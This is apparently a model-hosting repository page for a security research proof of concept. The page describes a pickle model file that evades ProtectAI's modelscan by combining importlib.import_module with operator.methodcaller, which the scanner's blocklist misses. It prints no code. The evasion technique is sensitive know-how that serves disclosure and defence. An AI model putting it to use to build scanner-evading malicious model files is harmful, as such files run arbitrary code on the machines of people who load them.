You need to agree to share your contact information to access this model

This repository is publicly accessible, but you have to accept the conditions to access its files and content.

Log in or Sign Up to review the conditions and access this model content.

Security Research PoC โ€” modelscan bypass

This repository contains a proof-of-concept model file demonstrating a bypass of ProtectAI's modelscan scanner.

DO NOT load untrusted model files. This file executes arbitrary code on load.

Vulnerability

The pickle payload uses importlib.import_module combined with operator.methodcaller to achieve code execution. Neither module is in modelscan's unsafe_globals blocklist.

Impact

Any pickle-based model file (.pkl, .bin, .pt, .pth, .ckpt) can bypass modelscan and execute arbitrary code. The fundamental issue is that blocking individual modules (os, subprocess, etc.) is insufficient when importlib.import_module can dynamically import any module at runtime.

Tested Against

modelscan 0.7.6 (latest pip release)

Downloads last month

-

Downloads are not tracked for this model. How to track
Inference Providers NEW
This model isn't deployed by any Inference Provider. ๐Ÿ™‹ Ask for provider support